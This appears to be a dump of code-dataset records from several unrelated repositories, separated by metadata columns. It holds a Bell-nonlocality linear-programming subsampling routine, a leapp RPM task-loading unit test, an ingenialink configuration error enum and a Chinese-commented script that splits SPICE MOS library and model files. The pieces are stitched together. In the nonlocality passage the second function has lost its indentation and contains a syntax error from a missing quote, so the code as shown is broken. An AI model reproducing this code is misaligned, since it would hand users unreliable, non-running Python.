                If None then solves only LP with max_size of constraints without iteration.
                If given as sequence then starts iteration from custom initial subset of
                constraints. [Default: None]
            max_size (int): maximal number of constraints in iterative solving.
                If None then in final step solves the full LP with all rows.[Default: None]
            step (int): the increase in size of subset of constraints in iterative solving.
                if None then ceil(1% of all constraints).[Default: None]
            runs (int): the number of repetitions of a single step, each time with new random
                subset of constraints.
            progressbar (bool): show tqdm progressbar if True. [Default: False]
            plot (bool): show plot of nonlocality strength vs size of constraints subset.
                [Default: False]
        Returns:
            None: results are aggregated internally and optionally plotted.
        """
        (rows, min_size, max_size, step, subset) = self.__handle_args(
            source=source, rows=rows, nosignaling=nosignaling,
            min_size=min_size, max_size=max_size, step=step)
        # NL maps subset size -> counts of test outcomes over `runs` repeats.
        NL = {}
        if progressbar:
            pbar = tqdm(initial=0, total=max_size, desc='size')
        for size in itertools.chain(range(min_size, max_size, step), [max_size]):
            if nosignaling and len(rows) < size:
                print("Not enough nonredundant rows for subset of size: {}".format(size))
                break
            nl = collections.defaultdict(int)
            if progressbar:
                Runs = tqdm(range(runs), desc='runs', leave=False)
            else:
                Runs = range(runs)
            for run in Runs:
                # Draw a fresh random subset of constraints for each run.
                if not nosignaling:
                    subset = np.random.choice(rows, size, replace=False)
                else:
                    Rows = rows.copy()
                    lenR = len(Rows)
                    subset = []
                    while len(subset) < size and lenR > 0:
                        new = Rows.pop(np.random.randint(lenR))
                        if self.get_nonredundant(new):
                            subset.append(new)
                        else:
                            # Redundant rows are dropped from `rows` for good,
                            # so later runs skip re-checking them.
                            rows.remove(new)
                        lenR -= 1
                    if len(subset) < size:
                        break
                self.new_LP('feasibility')
                self.populate_LP('feasibility',source,subset)
                self.LP.solve()
                status = self.LP.solution.status[self.LP.solution.get_status()]
                # True -> nonlocality detected; False -> classical model found.
                if status=='infeasible':
                    nl[True] += 1
                elif status=='optimal':
                    nl[False] += 1
                else:
                    nl[status] += 1
            NL[size] = dict(nl)
            if progressbar :
                pbar.update(size - pbar.n)
                pbar.set_description_str(refresh=True)
        if plot:
            fig, ax = plt.subplots(1,figsize=(12,8))
            for item in ([ax.title,ax.xaxis.label,ax.yaxis.label]
                         + ax.get_xticklabels() + ax.get_yticklabels()):
                item.set_fontsize(14)
            ax.plot(sorted(NL.keys()),[NL[k].get(True,0)/sum(NL[k].values())
                                       for k in sorted(NL.keys())],lw=1,marker='.')
            ax.set_title('Bell nonlocality test with subsampling',fontsize=18)
            ax.set_xlabel('subset size')
            ax.set_ylabel('success rate of nonlocality detection')
            ax.grid()
            fig.tight_layout()
        return
#-----------------------------------------------------------------------------------------------
def nonlocality_sub_strength(self,
source: str = 'meas',
rows: Optional[Sequence[int]] = None,
nosignaling: bool = False,
min_size: Optional[int] = None,
max_size: Optional[int] = None,
step: Optional[int] = None,
runs: int = 1,
progressbar: bool = False,
plot: bool = False):
""" Subsampling constraints in nonlocality strength calculations :
Args:
source (str): source of quantum correlations. [Default: 'meas']
'meas': probabilities from qiskit backend results.
'calc': probabilities calculated according to Born rule.
rows (list[int]): indices of constraints taken into account in solving LP.
If None then takes all constraints. [Default: None]
nosignaling: (bool): if True then only nonredundand rows according to default
nosignaling rule are passed to LP. [Default: False]
min_size (int or list[int]): initial number of constraints in iterative solving.
If None then solves only LP with max_size of constraints without iteration.
If given as sequence then starts iteration from custom initial subset of
constraints. [Default: None]
max_size (int): maximal number of constraints in iterative solving.
If None then in final step solves the full LP with all rows.[Default: None]
step (int): the increase in size of subset of constraints in iterative solving.
if None then ceil(1% of all constraints).[Default: None]
runs (int): the number of repetitions of a single step, each time with new random
subset of constraints.
progressbar (bool): show tqdm progressbar if True. [Default: False]
plot (bool): show plot of nonlocality strength vs size of constraints subset.
[Default: False]
"""
(rows, min_size, max_size, step, subset) = self.__handle_args(
source=source, rows=rows, nosignaling=nosignaling,
min_size=min_size, max_size=max_size, step=step)
STRENGTHstat = {}
if progressbar:
pbar = tqdm(initial=0, total=max_size, desc='size')
for size in itertools.chain(range(min_size, max_size, step), [max_size]):
if nosignaling and len(rows) < size:
print("Not enough nonredundant rows for subset of size: {}".format(size))
break
STRENGTH = []
if progressbar:
Runs = tqdm(range(runs), desc='runs', leave=False)
else:
Runs = range(runs)
for run in Runs:
if not nosignaling:
subset = np.random.choice(rows, size, replace=False)
else:
Rows = rows.copy()
lenR = len(Rows)
subset = []
while len(subset) < size and lenR > 0:
new = Rows.pop(np.random.randint(lenR))
if self.get_nonredundant(new):
subset.append(new)
else:
rows.remove(new)
lenR -= 1
if len(subset) < size:
break
self.new_LP('optimization')
self.populate_LP('optimization',source,subset)
self.LP.solve()
cv = self.LP.solution.get_objective_value()
STRENGTH.append(1 - cv)
STRENGTHstat[size] = {'mean':np.mean(STRENGTH),'stddev':np.std(STRENGTH),
stat':len(STRENGTH)}
if progressbar:
pbar.update(size - pbar.n)
pbar.set_description_str(refresh=True)
if plot:
fig, ax = plt.subplots(1,figsize=(12,8))
for item in ([ax.title,ax.xaxis.label,ax.yaxis.label]
+ ax.get_xticklabels() + ax.get_yticklabels()):
item.set_fontsize(14)
STRENGTHmean = np.array([STRENGTHstat[k]['mean'] for k in STRENGTHstat])
STRENGTHstd = np.array([STRENGTHstat[k]['stddev'] for k in STRENGTHstat])
ax.plot(STRENGTHstat.keys(), STRENGTHmean, lw=1, color='blue', marker='.')
ax.fill_between(STRENGTHstat.keys(), STRENGTHmean+STRENGTHstd,
STRENGTHmean-STRENGTHstd, facecolor='blue', alpha=0.3)
ax.set_xlabel('subset size')
ax.set_ylabel('critical visibility')
ax.grid()
ticks = plt.yticks()
if (ticks[0][1] - STRENGTHmean[-1]) < (ticks[0][-1] - STRENGTHmean[-1])/20:
i = 1
else:
i = 0
ticks[0][i] = STRENGTHmean[-1]
plt.yticks(ticks[0][i:-1])
fig.tight_layout()
return fig.tight_layout()
| 3,598 | 32,580 | 24 |
965c347bd3b26e1f4421f05b0bae79f27969df24 | 1,491 | py | Python | repos/system_upgrade/common/actors/rpmtransactionconfigtaskscollector/tests/test_load_tasks_rpmtransactionconfigtaskscollector.py | sm00th/leapp-repository | 1c171ec3a5f9260a3c6f84a9b15cad78a875ac61 | [
"Apache-2.0"
] | 21 | 2018-11-20T15:58:39.000Z | 2022-03-15T19:57:24.000Z | repos/system_upgrade/common/actors/rpmtransactionconfigtaskscollector/tests/test_load_tasks_rpmtransactionconfigtaskscollector.py | sm00th/leapp-repository | 1c171ec3a5f9260a3c6f84a9b15cad78a875ac61 | [
"Apache-2.0"
] | 732 | 2018-11-21T18:33:26.000Z | 2022-03-31T16:16:24.000Z | repos/system_upgrade/common/actors/rpmtransactionconfigtaskscollector/tests/test_load_tasks_rpmtransactionconfigtaskscollector.py | sm00th/leapp-repository | 1c171ec3a5f9260a3c6f84a9b15cad78a875ac61 | [
"Apache-2.0"
] | 85 | 2018-11-20T17:55:00.000Z | 2022-03-29T09:40:31.000Z | import logging
from leapp.libraries.actor.rpmtransactionconfigtaskscollector import load_tasks, load_tasks_file
from leapp.libraries.stdlib import api
from leapp.models import RPM, InstalledRedHatSignedRPM
RH_PACKAGER = 'Red Hat, Inc. <http://bugzilla.redhat.com/bugzilla>'
| 39.236842 | 106 | 0.657277 | import logging
from leapp.libraries.actor.rpmtransactionconfigtaskscollector import load_tasks, load_tasks_file
from leapp.libraries.stdlib import api
from leapp.models import RPM, InstalledRedHatSignedRPM
RH_PACKAGER = 'Red Hat, Inc. <http://bugzilla.redhat.com/bugzilla>'
def test_load_tasks(tmpdir, monkeypatch):
    """load_tasks deduplicates entries, strips whitespace/blank lines, and drops
    already-installed packages from the 'to_install' set."""
    def consume_signed_rpms_mocked(*models):
        """Mocked api.consume: pretend only package 'c' is installed and RH-signed."""
        installed = [
            RPM(name='c', version='0.1', release='1.sm01', epoch='1', packager=RH_PACKAGER, arch='noarch',
                pgpsig='RSA/SHA256, Mon 01 Jan 1970 00:00:00 AM -03, Key ID 199e2f91fd431d51')
        ]
        yield InstalledRedHatSignedRPM(items=installed)
    monkeypatch.setattr(api, "consume", consume_signed_rpms_mocked)
    # Each task file repeats entries ('a', 'b', 'c') and mixes in stray
    # whitespace and blank lines to exercise the parser's normalization.
    tmpdir.join('to_install').write('a\n b\n c \n\n\nc\na\nc\nb')
    tmpdir.join('to_keep').write('a\n b\n c \n\n\nc\na\nc\nb')
    tmpdir.join('to_remove').write('a\n b\n c \n\n\nc\na\nc\nb')
    m = load_tasks(tmpdir.strpath, logging)
    # c is not going to be in "to_install" as it is already installed
    assert set(m.to_install) == set(['a', 'b'])
    assert set(m.to_keep) == set(['a', 'b', 'c'])
    assert set(m.to_remove) == set(['a', 'b', 'c'])
def test_load_tasks_file(tmpdir):
    """load_tasks_file deduplicates entries, trims whitespace and skips blank lines;
    an effectively empty file yields no tasks."""
    populated = tmpdir.join('to_install')
    populated.write('a\n b\n c \n\n\nc\na\nc\nb')
    assert set(load_tasks_file(populated.strpath, logging)) == {'a', 'b', 'c'}
    blank_only = tmpdir.join('to_keep')
    blank_only.write(' ')
    assert set(load_tasks_file(blank_only.strpath, logging)) == set()
| 1,167 | 0 | 46 |
9dce34501665a0ef27501cf8445600e0b82ee8e7 | 819 | py | Python | ingenialink/utils/errors.py | ingeniamc/ingenialink-python | 6011931697e48456f5638c2848303aac2e5bcb75 | [
"MIT"
] | 15 | 2017-08-30T13:43:14.000Z | 2022-03-29T07:04:30.000Z | ingenialink/utils/errors.py | ingeniamc/ingenialink-python | 6011931697e48456f5638c2848303aac2e5bcb75 | [
"MIT"
] | 11 | 2017-08-28T11:23:18.000Z | 2022-03-28T23:48:11.000Z | ingenialink/utils/errors.py | ingeniamc/ingenialink-python | 6011931697e48456f5638c2848303aac2e5bcb75 | [
"MIT"
] | 9 | 2017-09-30T08:28:42.000Z | 2022-03-12T19:11:43.000Z | from .._ingenialink import ffi, lib
from enum import IntEnum
def err_ipb_last():
    """Return the most recent IPB error code as a Python int."""
    raw_code = lib.ilerr_ipb_last()
    return int(ffi.cast("int", raw_code))
class CONFIGURATION_ERRORS(IntEnum):
    """Configuration errors.

    Error codes the drive can report during configuration.
    NOTE(review): the 0x06xx/0x08xx values look like they follow CANopen SDO
    abort-code conventions -- confirm against the device communication manual.
    """
    INCORRECT_ACCESS_TYPE = 0x06010000
    OBJECT_NOT_EXIST = 0x06020000
    OBJECT_NOT_CYCLIC_MAPPABLE = 0x06040041
    CYCLIC_MAPPING_TOO_LARGE = 0x06040042
    WRONG_CYCLIC_KEY = 0x08010000
    WRONG_CYCLIC_REGISTER_SIZE = 0x06070010
    COMMUNICATION_STATE_UNREACHABLE = 0x08010010
    COMMUNICATION_NOT_MODIFIABLE = 0x08010020
    UNSUPPORTED_REGISTER_VALUE = 0x060A0000
    INVALID_COMMAND = 0x08010030
    CRC_ERROR = 0x08010040
    UNSUPPORTED_SYNCHRONIZATION = 0x00007400
    ACTIVE_FEEDBACKS_HIGHER_THAN_ALLOWED = 0x00007500
    COMKIT_TIMEOUT = 0x05040000
| 31.5 | 53 | 0.772894 | from .._ingenialink import ffi, lib
from enum import IntEnum
def err_ipb_last():
"""Get IPB last last occurred error."""
return int(ffi.cast("int", lib.ilerr_ipb_last()))
class CONFIGURATION_ERRORS(IntEnum):
"""Configuration errors."""
INCORRECT_ACCESS_TYPE = 0x06010000
OBJECT_NOT_EXIST = 0x06020000
OBJECT_NOT_CYCLIC_MAPPABLE = 0x06040041
CYCLIC_MAPPING_TOO_LARGE = 0x06040042
WRONG_CYCLIC_KEY = 0x08010000
WRONG_CYCLIC_REGISTER_SIZE = 0x06070010
COMMUNICATION_STATE_UNREACHABLE = 0x08010010
COMMUNICATION_NOT_MODIFIABLE = 0x08010020
UNSUPPORTED_REGISTER_VALUE = 0x060A0000
INVALID_COMMAND = 0x08010030
CRC_ERROR = 0x08010040
UNSUPPORTED_SYNCHRONIZATION = 0x00007400
ACTIVE_FEEDBACKS_HIGHER_THAN_ALLOWED = 0x00007500
COMKIT_TIMEOUT = 0x05040000
| 0 | 0 | 0 |
f9303ec44e5a438900ce95e107a1cc6a734b9336 | 14,078 | py | Python | device modeing/split_lib_v1.0.py | RichardNeverGiveup/data_analysis_for_CMOS | 62a289bd3367b5d3a9ce9ba7f71e920706eafa4b | [
"MIT"
] | null | null | null | device modeing/split_lib_v1.0.py | RichardNeverGiveup/data_analysis_for_CMOS | 62a289bd3367b5d3a9ce9ba7f71e920706eafa4b | [
"MIT"
] | null | null | null | device modeing/split_lib_v1.0.py | RichardNeverGiveup/data_analysis_for_CMOS | 62a289bd3367b5d3a9ce9ba7f71e920706eafa4b | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# coding: utf-8
# In[1]:
import re
#*******************************************************
# user input:
# MOSNAME eg: lvnemos4_1p2_lvpw
# MOSTYPE eg: _ne_1p2
# LIB_FILENAME = '501per_35_VcA.lib'
# MDL_FILENAME = '501per_35_VcA.mdl'
#********************************************************
MOSNAME = '_llv_rvtp'
MOSTYPE = '_llv_rvtp'
LIB_FILENAME = 'trident_1d2_mos.lib' # 这里需要自己改一下lib和mdl的文件名作为路径。测试阶段先取这个方式来打开文件。
MDL_FILENAME = 'trident_1d2_mos.mdl'
# In[2]:
def get_dict_of_lib(LIB_FILENAME):
"""输入LIB的文件名,返回各个CORNER名为键,其对应的行内容为值的字典。"""
f = open(LIB_FILENAME).readlines()
for line_number, line in enumerate(f):
if ".lib statistical_mc" in line:
end_of_corners_in_lib = line_number
print("初步定位到总LIB的第%d行之前的内容为LIB需要分裂出的内容。"%end_of_corners_in_lib)
list_of_corners_star2end_tuples = []
for line_number, line in enumerate(f[:end_of_corners_in_lib]):
if ".lib" in line:
single_corner_start = line_number
if ".endl" in line:
single_corner_end = line_number
list_of_corners_star2end_tuples.append((single_corner_start, single_corner_end))
corner_param_dict = {}
for t in list_of_corners_star2end_tuples:
key = f[t[0]].split()[1] # tt_llv_corner as key
value = f[t[0]:t[1]+1]
corner_param_dict[key] = value
print("%s已经存入字典,其内容对应行号为%d到%d"%(key, t[0], t[1]))
return corner_param_dict
# In[3]:
def get_dict_of_single_mostype_dict_of_lib(corner_param_dict):
"""紧接着corner_param_dict = get_dict_of_lib(LIB_FILENAME)后面调用,传入含有多个MOSTYPE的LIB字典。
输出只剩一种MOSTYPE的字典。"""
reg_content = "\+.*?" + MOSTYPE + "\s*="
mark_foronetypemos_incorner = re.compile(reg_content)
single_mostype_corner_param_dict = {}
print("和你输入的MOSTYPE匹配的每个CORNER的首行和尾行如下!")
for k in corner_param_dict:
v = corner_param_dict[k]
new_v = []
for line in v:
if mark_foronetypemos_incorner.search(line):
new_v.append(line)
single_mostype_corner_param_dict[k] = new_v
print(new_v[0], new_v[-1])
print("********************************************************************************************************")
return single_mostype_corner_param_dict
# In[4]:
# In[5]:
#corner_param_dict = get_dict_of_lib(LIB_FILENAME)
#get_dict_of_single_mostype_dict_of_lib(corner_param_dict)
# In[6]:
def get_blank_striped_mdl(MDL_FILENAME, MOSNAME):
"""输出是去除了空行的mdl内容。"""
f = open(MDL_FILENAME).readlines()
content_temp_start = '.subckt\s*' + MOSNAME + "\s"
regex_temp_start = re.compile(content_temp_start)
content_temp_end = '.ends\s*' + MOSNAME + "\s"
regex_temp_end = re.compile(content_temp_end)
for line_number, line in enumerate(f):
if regex_temp_start.search(line):
print("定位到总MDL文件的第%d行作为临时起始行"%line_number)
temp_start = line_number
if regex_temp_end.search(line):
print("定位到总MDL文件的第%d行作为临时终止行"%line_number)
temp_end = line_number
tuple_of_linenumber_for_mdl_in_use = (temp_start, temp_end)
temp_start = tuple_of_linenumber_for_mdl_in_use[0] # '.subckt\s*'的行号
temp_end = tuple_of_linenumber_for_mdl_in_use[1] # '.ends\s*'的行号
mdl_in_use = f[temp_start: temp_end+1]
for line_number, line in enumerate(mdl_in_use):
if ".model" in line:
newstart = line_number
mdl_content = mdl_in_use[newstart:]
startlinenumberinoriginalmdl = newstart + temp_start # '.model'在'.subckt\s*'和'.ends\s*'之间的行号
print("定位到总MDL文件的第%d行作为真正的起始行"%startlinenumberinoriginalmdl)
blank_striped_mdl_content = []
for line_number, line in enumerate(mdl_content):
if line.strip() == "":
print("第%d行是空行。"%(startlinenumberinoriginalmdl + line_number ))
continue
blank_striped_mdl_content.append(line)
blank_striped_mdl_content
print("根据你输入的MOSNAME:%s,将从原总MDL中复制第%d行到第%d行。"%(MOSNAME, startlinenumberinoriginalmdl, temp_end))
print("********************************************************************************************************")
return blank_striped_mdl_content
# In[7]:
def clean_all_mis_in_one_line(line):
"""利用从右向左的机制去一直去除_mis参数,返回除去干净了的Line。"""
while True:
if '_mis' in line:
startof_mis = line.rfind('_mis') # 从右向左,找到了_mis的位置
startof_plus_nexttomis = line[:startof_mis].rfind('+') # 找到了第一个紧靠mis左边的+号
startof_equal_nexttomis = line[:startof_mis].rfind('=') # 找到了第一个紧靠mis左边的=号
remain = line[startof_equal_nexttomis:startof_plus_nexttomis] #第一个紧靠mis左边的=号到 mis直接的字符,用于判断是纯数字了,还是数字+参数的格式
# remain 是这样的 "= '0.35 + deta0_ne_1p2 "
original = line[startof_equal_nexttomis:startof_mis+5] #把含_mis'这部分原始的取出来,如"= '0.35 + deta0_ne_1p2 + deta0_ne_1p2_mis'"
if '+' in remain:
for_replacement = remain.strip() + "'"
else:
for_replacement = remain.strip().replace("'","")
line = line.replace(original, for_replacement)
else:
break
return line
# In[8]:
####################测试去除每行中MIS的代码####################################################################################
##################################################################################################################################
# line = "+pnfactor = -3E-14 eta0 = '0.35 + deta0_ne_1p2 + deta0_ne_1p2_mis' peta0 = '-1.81E-15 + dpeta0_ne_1p2'"
# line = "+pnfactor = -3E-14 eta0 = '0.35 + deta0_ne_1p2_mis' peta0 = '-1.81E-15 + dpeta0_ne_1p2'"
# line = "+pnfactor = '0.39 + pnf_ne_1p2_mis' eta0 = '0.35 + deta0_ne_1p2_mis' peta0 = '-1.81E-15 + dpeta0_ne_1p2'"
# while True:
# if '_mis' in line:
# startof_mis = line.rfind('_mis') # 从右向左,找到了_mis的位置
# startof_plus_nexttomis = line[:startof_mis].rfind('+') # 找到了第一个紧靠mis左边的+号
# startof_equal_nexttomis = line[:startof_mis].rfind('=') # 找到了第一个紧靠mis左边的=号
# remain = line[startof_equal_nexttomis:startof_plus_nexttomis] #第一个紧靠mis左边的=号到 mis直接的字符,用于判断是纯数字了,还是数字+参数的格式
# # remain 是这样的 "= '0.35 + deta0_ne_1p2 "
# original = line[startof_equal_nexttomis:startof_mis+5] #把含_mis'这部分原始的取出来,如"= '0.35 + deta0_ne_1p2 + deta0_ne_1p2_mis'"
# if '+' in remain:
# for_replacement = remain.strip() + "'"
# else:
# for_replacement = remain.strip().replace("'","")
# line = line.replace(original, for_replacement)
# else:
# break
# line
##################################################################################################################################
##################################################################################################################################
# In[9]:
# In[10]:
# #########测试cf去除效果################################################################################################
# #######################################################################################################################
# line = "+cf = '0 + 4.5E-11*pre_layout_sw' clc = 1E-7 cle = 0.6"
# line = "+clc = 1E-7 cle = 0.6 cf = '0 + 4.5E-11*pre_layout_sw'"
# line = "+clc = 1E-7 cf = '0 + 4.5E-11*pre_layout_sw cle = 0.6 '"
# print(line)
# startof_cf = line.find('cf')
# startof_pre = line.find("*pre_layout_sw")
# startof_equal = line[:startof_pre].rfind('=')
# startof_plus = line[:startof_pre].rfind('+')
# for_replacement = "=" + line[startof_plus:startof_pre].replace('+',"").strip() # 得到 '=4.5E-11'
# orginal = line[startof_equal:startof_pre+len("*pre_layout_sw'")] # 得到 "= '0 + 4.5E-11*pre_layout_sw'"
# line = line.replace(orginal, for_replacement)
# print(line)
# #######################################################################################################################
# In[11]:
# In[12]:
############用于测试替换cf的代码################################################################################################
##################################################################################################################################
# line = "+cf = '0 + 4.5E-11*pre_layout_sw' clc = 1E-7 cle = 0.6 "
# startof_cf = line.find('cf')
# startof_pre = line.find("*pre_layout_sw")
# startof_equal = line.find('=')
# startof_plus = line[startof_cf:startof_pre].find('+')
# for_replacement = "=" + line[startof_plus:startof_pre].replace('+',"").strip() # 得到 '=4.5E-11'
# orginal = line[startof_equal:startof_pre+len("*pre_layout_sw'")] # 得到 "= '0 + 4.5E-11*pre_layout_sw'"
# line.replace(orginal, for_replacement)
##################################################################################################################################
##################################################################################################################################
# In[13]:
def get_allparams_cleaned_mdl(mydata):
"""输入是被定位出来的含有出事model内容的mdl列表,称为mydata。输出被正则替换掉全部参数的mdl列表"""
# 这一段注释是测试代码,用于验证正则表达式
# pattern = re.compile(r"\'([-]*[0-9.E]*\-*\d*)[+-]*.*?\'") # 这是当初为钟灿写的正则,我现在也看不太懂了。
# for line in mydata:
# if "'" in line:
# print(line)
# print(pattern.findall(line))
pattern = re.compile(r"\'([-]*[0-9.E]*\-*\d*)[+-]*.*?\'") # 这是当初为钟灿写的正则,我现在也看不太懂了。
without_all_params = []
print("现在执行替换全部MDL参数的函数**************************************************************************************")
print("所有的含义参数的行内容如下*****************************************************************************************")
for line in mydata:
if pattern.search(line):
print(line)
# print(pattern.sub(r'\1', line))
line = pattern.sub(r'\1', line)
without_all_params.append(line)
#without_all_params = without_all_params[:-1] # 去掉最后一个 .ends lvnemos4_1p2_lvpw
print("********************************************************************************************************************")
return without_all_params
# In[14]:
# In[15]:
###########处理LIB的部分#########################################################################
corner_param_dict = get_dict_of_lib(LIB_FILENAME)
single_mostype_corner_param_dict = get_dict_of_single_mostype_dict_of_lib(corner_param_dict)
final_lib_part = get_final_lib_part(MOSNAME, single_mostype_corner_param_dict)
###########处理MDL的部分####################################################################
raw_mdl = get_blank_striped_mdl(MDL_FILENAME,MOSNAME)
mis_cleaned_mdl = get_mis_cleaned_mdl(raw_mdl)
cf_cleaned_mdl = get_cf_cleaned_mdl(mis_cleaned_mdl)
allparams_cleaned_mdl = get_allparams_cleaned_mdl(cf_cleaned_mdl)
############################################################################################
final_lib = get_final_lib(final_lib_part, cf_cleaned_mdl)
libfilename = MOSNAME + '.lib_NEW'
pmfilename = MOSNAME + '.pm_NEW'
with open(libfilename, mode='w') as f:
for line in final_lib:
f.writelines(line)
with open(pmfilename, mode='w') as f:
for line in allparams_cleaned_mdl:
f.writelines(line)
input("输入任意键退出!")
| 38.782369 | 130 | 0.525146 | #!/usr/bin/env python
# coding: utf-8
# In[1]:
import re
#*******************************************************
# user input:
# MOSNAME eg: lvnemos4_1p2_lvpw
# MOSTYPE eg: _ne_1p2
# LIB_FILENAME = '501per_35_VcA.lib'
# MDL_FILENAME = '501per_35_VcA.mdl'
#********************************************************
MOSNAME = '_llv_rvtp'
MOSTYPE = '_llv_rvtp'
LIB_FILENAME = 'trident_1d2_mos.lib' # 这里需要自己改一下lib和mdl的文件名作为路径。测试阶段先取这个方式来打开文件。
MDL_FILENAME = 'trident_1d2_mos.mdl'
# In[2]:
def get_dict_of_lib(LIB_FILENAME):
    """输入LIB的文件名,返回各个CORNER名为键,其对应的行内容为值的字典。

    Parse the corner sections (``.lib <name>`` ... ``.endl``) that appear
    before the ``.lib statistical_mc`` marker.

    Args:
        LIB_FILENAME (str): path of the combined .lib file.

    Returns:
        dict: corner name -> list of raw lines (including the .lib/.endl lines).

    Raises:
        ValueError: if the ``.lib statistical_mc`` marker is missing.
    """
    # BUGFIX: use a context manager so the file handle is always closed.
    with open(LIB_FILENAME) as lib_file:
        f = lib_file.readlines()
    end_of_corners_in_lib = None
    for line_number, line in enumerate(f):
        if ".lib statistical_mc" in line:
            end_of_corners_in_lib = line_number
    if end_of_corners_in_lib is None:
        # BUGFIX: previously a missing marker surfaced later as an opaque NameError.
        raise ValueError("'.lib statistical_mc' marker not found in %s" % LIB_FILENAME)
    print("初步定位到总LIB的第%d行之前的内容为LIB需要分裂出的内容。"%end_of_corners_in_lib)
    # Collect (start, end) line-number pairs for every .lib/.endl corner section.
    list_of_corners_star2end_tuples = []
    for line_number, line in enumerate(f[:end_of_corners_in_lib]):
        if ".lib" in line:
            single_corner_start = line_number
        if ".endl" in line:
            single_corner_end = line_number
            list_of_corners_star2end_tuples.append((single_corner_start, single_corner_end))
    corner_param_dict = {}
    for t in list_of_corners_star2end_tuples:
        key = f[t[0]].split()[1]  # e.g. 'tt_llv_corner' from '.lib tt_llv_corner'
        value = f[t[0]:t[1]+1]
        corner_param_dict[key] = value
        print("%s已经存入字典,其内容对应行号为%d到%d"%(key, t[0], t[1]))
    return corner_param_dict
# In[3]:
def get_dict_of_single_mostype_dict_of_lib(corner_param_dict, mostype=None):
    """紧接着corner_param_dict = get_dict_of_lib(LIB_FILENAME)后面调用,传入含有多个MOSTYPE的LIB字典。
    输出只剩一种MOSTYPE的字典。

    Filter every corner's lines down to the parameter lines of one device type.

    Args:
        corner_param_dict (dict): corner name -> list of raw .lib lines.
        mostype (str, optional): device-type suffix used to select parameter
            lines (e.g. '_llv_rvtp').  Defaults to the module-level MOSTYPE
            constant, preserving the original behaviour.

    Returns:
        dict: corner name -> list of lines matching ``+...<mostype> =``.
    """
    if mostype is None:
        mostype = MOSTYPE  # backward-compatible fallback to the module constant
    # BUGFIX: raw strings so the regex escapes are genuine regex escapes, not
    # deprecated string escapes.
    reg_content = r"\+.*?" + mostype + r"\s*="
    mark_foronetypemos_incorner = re.compile(reg_content)
    single_mostype_corner_param_dict = {}
    print("和你输入的MOSTYPE匹配的每个CORNER的首行和尾行如下!")
    for k in corner_param_dict:
        v = corner_param_dict[k]
        new_v = [line for line in v if mark_foronetypemos_incorner.search(line)]
        single_mostype_corner_param_dict[k] = new_v
        # NOTE(review): raises IndexError if a corner has no matching line --
        # same as the original behaviour.
        print(new_v[0], new_v[-1])
    print("********************************************************************************************************")
    return single_mostype_corner_param_dict
# In[4]:
def get_final_lib_part(MOSNAME, single_mostype_corner_param_dict):
    """Wrap each corner's filtered parameter lines with the per-corner
    scaffolding (``.lib <corner>`` / ``.param`` header, a reference to the
    shared ``<MOSNAME>.lib`` core section, and ``.endl <corner>`` footer)."""
    assembled = []
    core_include = ".lib '" + MOSNAME + ".lib' core\n"
    for corner_name, param_lines in single_mostype_corner_param_dict.items():
        assembled.append(".lib " + corner_name + "\n")
        assembled.append(".param\n")
        assembled.extend(param_lines)
        assembled.append(core_include)
        assembled.append(".endl " + corner_name + "\n\n")
    return assembled
# In[5]:
#corner_param_dict = get_dict_of_lib(LIB_FILENAME)
#get_dict_of_single_mostype_dict_of_lib(corner_param_dict)
# In[6]:
def get_blank_striped_mdl(MDL_FILENAME, MOSNAME):
    """输出是去除了空行的mdl内容。

    Extract the ``.model`` ... ``.ends <MOSNAME>`` portion of the named subckt
    from the combined .mdl file, dropping blank lines.

    Args:
        MDL_FILENAME (str): path of the combined .mdl file.
        MOSNAME (str): subckt name, e.g. 'lvnemos4_1p2_lvpw'.

    Returns:
        list[str]: lines from the '.model' line through '.ends <MOSNAME>'.

    Raises:
        ValueError: if the subckt cannot be located in the file.
    """
    # BUGFIX: close the file deterministically with a context manager.
    with open(MDL_FILENAME) as mdl_file:
        f = mdl_file.readlines()
    # BUGFIX: raw strings so \s stays a regex escape rather than a string escape.
    content_temp_start = r'.subckt\s*' + MOSNAME + r"\s"
    regex_temp_start = re.compile(content_temp_start)
    content_temp_end = r'.ends\s*' + MOSNAME + r"\s"
    regex_temp_end = re.compile(content_temp_end)
    temp_start = temp_end = None
    for line_number, line in enumerate(f):
        if regex_temp_start.search(line):
            print("定位到总MDL文件的第%d行作为临时起始行"%line_number)
            temp_start = line_number
        if regex_temp_end.search(line):
            print("定位到总MDL文件的第%d行作为临时终止行"%line_number)
            temp_end = line_number
    if temp_start is None or temp_end is None:
        # BUGFIX: a missing subckt previously surfaced as an opaque NameError.
        raise ValueError("subckt '%s' not found in %s" % (MOSNAME, MDL_FILENAME))
    mdl_in_use = f[temp_start: temp_end+1]
    # Skip everything before the '.model' line inside the subckt body.
    for line_number, line in enumerate(mdl_in_use):
        if ".model" in line:
            newstart = line_number
    mdl_content = mdl_in_use[newstart:]
    startlinenumberinoriginalmdl = newstart + temp_start  # '.model' line number in the original file
    print("定位到总MDL文件的第%d行作为真正的起始行"%startlinenumberinoriginalmdl)
    blank_striped_mdl_content = []
    for line_number, line in enumerate(mdl_content):
        if line.strip() == "":
            print("第%d行是空行。"%(startlinenumberinoriginalmdl + line_number))
            continue
        blank_striped_mdl_content.append(line)
    print("根据你输入的MOSNAME:%s,将从原总MDL中复制第%d行到第%d行。"%(MOSNAME, startlinenumberinoriginalmdl, temp_end))
    print("********************************************************************************************************")
    return blank_striped_mdl_content
# In[7]:
def clean_all_mis_in_one_line(line):
    """Strip every trailing ``*_mis`` mismatch term from *line*, scanning
    right-to-left until none remain.

    ``eta0 = '0.35 + d + d_mis'`` collapses to ``eta0 = '0.35 + d'``; when only
    the mismatch term follows the value, the quotes are dropped as well
    (``eta0 = '0.35 + d_mis'`` -> ``eta0 = 0.35``)."""
    while '_mis' in line:
        mis_pos = line.rfind('_mis')
        plus_pos = line[:mis_pos].rfind('+')      # '+' immediately left of the mismatch term
        equal_pos = line[:mis_pos].rfind('=')     # '=' opening the quoted expression
        value_head = line[equal_pos:plus_pos]     # e.g. "= '0.35 + d " or "= '0.35 "
        old_expr = line[equal_pos:mis_pos + 5]    # includes the closing quote after '_mis'
        if '+' in value_head:
            new_expr = value_head.strip() + "'"   # other terms remain: keep the quotes
        else:
            new_expr = value_head.strip().replace("'", "")  # only the value remains: drop quotes
        line = line.replace(old_expr, new_expr)
    return line
# In[8]:
####################测试去除每行中MIS的代码####################################################################################
##################################################################################################################################
# line = "+pnfactor = -3E-14 eta0 = '0.35 + deta0_ne_1p2 + deta0_ne_1p2_mis' peta0 = '-1.81E-15 + dpeta0_ne_1p2'"
